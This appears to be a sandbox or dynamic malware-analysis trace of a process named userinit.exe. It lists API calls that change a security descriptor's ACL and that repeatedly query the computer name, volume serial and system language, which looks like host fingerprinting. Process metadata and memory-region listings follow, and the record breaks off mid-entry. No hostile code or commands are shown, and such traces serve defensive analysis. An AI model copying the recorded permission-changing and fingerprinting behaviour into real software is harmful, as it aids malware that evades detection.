[0120.608] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x6d0f28, lpbSaclPresent=0x16e3a4, pSacl=0x16e398, lpbSaclDefaulted=0x16e39c | out: lpbSaclPresent=0x16e3a4, pSacl=0x16e398, lpbSaclDefaulted=0x16e39c) returned 1
[0120.608] LocalFree (hMem=0x6d0f28) returned 0x0
[0120.608] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.608] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.608] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0120.608] GetLengthSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.608] GetLastError () returned 0x0
[0120.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.608] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0120.608] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.609] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0120.609] InitializeAcl (in: pAcl=0x6d7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x6d7fa8) returned 1
[0120.609] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.609] GetLengthSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.609] GetLastError () returned 0x0
[0120.609] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.609] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.609] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0120.609] SetLastError (dwErrCode=0x0)
[0120.609] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.609] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0120.609] GetSidSubAuthorityCount (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b1f615
[0120.609] GetLastError () returned 0x0
[0120.609] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.609] SetLastError (dwErrCode=0x0)
[0120.609] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.609] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0120.609] GetSidIdentifierAuthority (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b1f616
[0120.610] GetLastError () returned 0x0
[0120.610] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.610] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.610] SetLastError (dwErrCode=0x0)
[0120.610] GetSidSubAuthorityCount (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b1f615
[0120.610] GetLastError () returned 0x0
[0120.610] SetLastError (dwErrCode=0x0)
[0120.610] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.610] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0120.610] GetSidSubAuthority (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2b1f61c
[0120.610] GetLastError () returned 0x0
[0120.610] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.610] GetLengthSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.610] GetLastError () returned 0x0
[0120.610] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.610] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0120.610] AddAce (in: pAcl=0x6d7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x6c2f90, nAceListLength=0x14 | out: pAcl=0x6d7fa8) returned 1
[0120.610] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.610] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0120.611] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.611] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0120.611] SetSecurityInfo () returned 0x0
[0120.611] CloseHandle (hObject=0x1d0) returned 1
[0120.611] GetComputerNameA (in: lpBuffer=0x2b1fd84, nSize=0x16e66c | out: lpBuffer="CRH2YWU7", nSize=0x16e66c) returned 1
[0120.611] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.611] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.612] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e560, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.612] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.612] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e560, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.612] VirtualAlloc (lpAddress=0x2b20000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b20000
[0120.612] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.612] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.612] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.613] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.613] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.613] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.613] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.613] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.613] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.613] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.613] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.613] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.614] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.614] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.614] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.614] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.614] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16e654, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x16e668, lpMaximumComponentLength=0x16e664, lpFileSystemFlags=0x16e660, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16e668*=0x90c08a66, lpMaximumComponentLength=0x16e664*=0xff, lpFileSystemFlags=0x16e660*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0120.614] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16e558, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.614] GetSystemDefaultLangID () returned 0x6b0409
[0120.614] VerLanguageNameA (in: wLang=0x409, szLang=0x16e60c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0120.615] ExitProcess (uExitCode=0x0)
Thread:
id = 245
os_tid = 0xfe4
Thread:
id = 246
os_tid = 0xfe8
Process:
id = "36"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be780"
os_pid = "0x854"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3883
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3884
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 3885
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 3886
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 3887
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3888
start_va = 0x6d0000
end_va = 0x6d8fff
entry_point = 0x6d0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3889
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3890
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3891
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3892
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 3893
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3895
start_va = 0x250000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 3896
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3897
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3898
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3899
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3900
start_va = 0x1e0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 3901
start_va = 0x6cc60000
end_va = 0x6cce3fff
entry_point = 0x6cc60000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3902
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3903
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3904
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3905
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3906
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3907
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3908
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3909
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3910
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3911
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3912
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3913
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3914
start_va = 0x100000
end_va = 0x1c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 3915
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3916
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3917
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3918
start_va = 0x1d0000
end_va = 0x1d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3919
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3920
start_va = 0x680000
end_va = 0x68ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 3921
start_va = 0x6e0000
end_va = 0x12dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 3922
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 3923
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3924
start_va = 0x12e0000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 3925
start_va = 0x12e0000
end_va = 0x13befff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012e0000"
filename = ""
Region:
id = 3926
start_va = 0x1430000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001430000"
filename = ""
Region:
id = 3927
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 3928
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 3929
start_va = 0x1470000
end_va = 0x15affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 3930
start_va = 0x15b0000
end_va = 0x1edffff
entry_point = 0x15b0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3931
start_va = 0x200000
end_va = 0x206fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 3932
start_va = 0x210000
end_va = 0x211fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 3933
start_va = 0x1ee0000
end_va = 0x22d2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ee0000"
filename = ""
Region:
id = 3934
start_va = 0x350000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3935
start_va = 0x22e0000
end_va = 0x23ecfff
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 3936
start_va = 0x1470000
end_va = 0x156ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 3937
start_va = 0x1570000
end_va = 0x15affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3938
start_va = 0x23f0000
end_va = 0x25effff
entry_point = 0x0
region_type = private
name = "private_0x00000000023f0000"
filename = ""
Region:
id = 3939
start_va = 0x25f0000
end_va = 0x2670fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3941
start_va = 0x2680000
end_va = 0x2702fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3942
start_va = 0x25f0000
end_va = 0x2674fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3943
start_va = 0x2680000
end_va = 0x2706fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3944
start_va = 0x25f0000
end_va = 0x2678fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3978
start_va = 0x2680000
end_va = 0x270afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3979
start_va = 0x25f0000
end_va = 0x267cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3980
start_va = 0x2680000
end_va = 0x270efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3981
start_va = 0x2710000
end_va = 0x27a0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 3982
start_va = 0x25f0000
end_va = 0x2682fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3983
start_va = 0x2690000
end_va = 0x2724fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 3984
start_va = 0x25f0000
end_va = 0x2686fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3985
start_va = 0x2690000
end_va = 0x2728fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 3986
start_va = 0x25f0000
end_va = 0x268afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3987
start_va = 0x2690000
end_va = 0x272cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 3996
start_va = 0x25f0000
end_va = 0x268efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 3997
start_va = 0x2690000
end_va = 0x2730fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 3998
start_va = 0x2740000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 4010
start_va = 0x25f0000
end_va = 0x2694fff
